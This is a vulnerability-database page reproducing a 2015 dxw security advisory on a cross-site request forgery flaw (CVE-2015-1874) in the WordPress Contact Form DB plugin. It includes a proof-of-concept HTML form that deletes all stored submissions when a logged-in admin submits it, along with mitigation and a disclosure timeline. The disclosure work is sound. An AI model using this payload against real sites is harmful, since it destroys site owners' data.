Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTom AdamsPACKETSTORM:130654
HistoryMar 04, 2015 - 12:00 a.m.

WordPress Contact Form DB 2.8.29 Cross Site Request Forgery

2015-03-0400:00:00
Tom Adams
packetstormsecurity.com
20

EPSS

0.005

Percentile

76.1%

JSON
`Details  
================  
Software: Contact Form DB  
Version: 2.8.29  
Homepage: https://wordpress.org/plugins/contact-form-7-to-database-extension/  
Advisory report: https://security.dxw.com/advisories/csrf-in-contact-form-db-allows-attacker-to-delete-all-stored-form-submissions/  
CVE: CVE-2015-1874  
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)  
  
Description  
================  
CSRF in Contact Form DB allows attacker to delete all stored form submissions  
  
Vulnerability  
================  
An attacker able to convince a logged in admin user to follow a link (for instance via spearphishing) will be able to cause all records stored by this plugin to be removed.  
  
Proof of concept  
================  
If a logged-in administrator user clicks the submit button on this form, all records stored by the plugin will be deleted (in a real attack the form can be made to auto-submit using Javascript).  
<form action=\"http://localhost/wp-admin/admin.php?page=CF7DBPluginSubmissions\" method=\"post\">  
<input name=\"all\" type=\"text\" value=\"y\">  
<input name=\"delete\" type=\"text\" value=\"y\">  
<input type=\"submit\">  
</form>  
  
Mitigations  
================  
Upgrade to version 2.8.32 or later  
  
Disclosure policy  
================  
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/  
  
Please contact us on [email protected] to acknowledge this report if you received it via a third party (for example, [email protected]) as they generally cannot communicate with us on your behalf.  
  
This vulnerability will be published if we do not receive a response to this report with 14 days.  
  
Timeline  
================  
  
2015-02-05: Discovered  
2015-02-17: Reported to vendor by email  
2015-02-22: Vendor responded and agreed a schedule for fix  
2015-02-23: Vendor published a fix in version 2.8.32  
2015-03-04: Advisory published  
  
  
  
Discovered by dxw:  
================  
Tom Adams  
Please visit security.dxw.com for more information.  
  
  
  
  
`

Related

nvd 1
patchstack 1
cve 1
prion 1
cvelist 1
wpvulndb 1
nvd
nvd
CVE-2015-1874
2015-03-09 16:59:00
patchstack
patchstack
WordPress Contact Form DB Plugin <= 2.8.31 - CSRF
2015-02-17 00:00:00
cve
cve
CVE-2015-1874
2015-03-09 16:59:00
prion
prion
Cross site request forgery (csrf)
2015-03-09 16:59:00
cvelist
cvelist
CVE-2015-1874
2015-03-09 16:00:00
wpvulndb
wpvulndb
Contact Form DB <= 2.8.29 - Cross-Site Request Forgery (CSRF)
2015-03-04 00:00:00

EPSS

0.005

Percentile

76.1%

JSON
Related for PACKETSTORM:130654
nvd1patchstack1cve1prion1cvelist1wpvulndb1